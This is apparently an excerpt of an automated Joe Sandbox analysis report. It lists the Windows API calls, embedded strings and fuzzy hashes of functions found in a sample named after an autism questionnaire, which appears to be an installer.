                                                                                              • API String ID: 3997070919-2963016475
                                                                                              • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                                              • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                                                              • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                                              • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                                              • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                                                              • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                                              • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                                                              • API String ID: 1375471231-4222912607
                                                                                              • Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                                              • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                                                              • Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                                              • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetActiveWindow.USER32 ref: 005C92F7
                                                                                              • GetFocus.USER32 ref: 005C92FF
                                                                                              • RegisterClassW.USER32 ref: 005C9320
                                                                                              • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                                                              • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                              • String ID: TWindowDisabler-Window
                                                                                              • API String ID: 495420250-1824977358
                                                                                              • Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                                              • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                                                              • Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                                              • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                                                              • SetWindowLongW.USER32 ref: 006C469F
                                                                                              • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                                                                • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                                                • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                                                • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                              • String ID: Loj$Setup
                                                                                              • API String ID: 1533765661-1180797960
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                                                              • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                                                              • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                                                              • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4025006896-0
                                                                                              • Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                                              • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                                                              • Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                                              • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 598 6acabc-6acac4 599 6acac7-6acacd call 60c158 598->599 601 6acad2-6acada 599->601 602 6acadc-6acae4 GetLastError 601->602 603 6acb07-6acb0d 601->603 602->603 604 6acae6-6acaee GetLastError 602->604 604->603 605 6acaf0-6acafc GetTickCount 604->605 605->603 606 6acafe-6acb05 Sleep 605->606 606->599
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CountSleepTick
                                                                                              • String ID:
                                                                                              • API String ID: 2227064392-0
                                                                                              • Opcode ID: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
                                                                                              • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                                                              • Opcode Fuzzy Hash: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
                                                                                              • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • SendNotifyMessageW.USER32(001D025E,00000496,00002711,-00000001), ref: 006AE618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageNotifySend
                                                                                              • String ID: (\m$MS PGothic
                                                                                              • API String ID: 3556456075-219475269
                                                                                              • Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                                              • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                                                              • Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                                              • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 1375471231-2986845003
                                                                                              • Opcode ID: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
                                                                                              • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                                                              • Opcode Fuzzy Hash: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
                                                                                              • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick
                                                                                              • String ID: Failed to remove temporary directory: $bm
                                                                                              • API String ID: 536389180-2673898769
                                                                                              • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                                              • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                                                              • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                                              • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                                                              • API String ID: 3535843008-1113070880
                                                                                              • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                                              • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                                                              • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                                              • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
                                                                                              • RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$Unwind
                                                                                              • String ID:
                                                                                              • API String ID: 1141220122-0
                                                                                              • Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                                              • Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
                                                                                              • Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                                              • Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID: TWindowDisabler-Window
                                                                                              • API String ID: 716092398-1824977358
                                                                                              • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                                              • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                                                              • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                                              • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpen
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 47109696-1019749484
                                                                                              • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                                              • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                                                              • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                                              • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                                              Strings
                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                              • API String ID: 71445658-1109908249
                                                                                              • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                                              • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                                                              • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                                              • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                                                              • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileNext
                                                                                              • String ID:
                                                                                              • API String ID: 2066263336-0
                                                                                              • Opcode ID: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
                                                                                              • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                                                              • Opcode Fuzzy Hash: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
                                                                                              • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                                                              • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                                              • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                                                              • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                                              • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
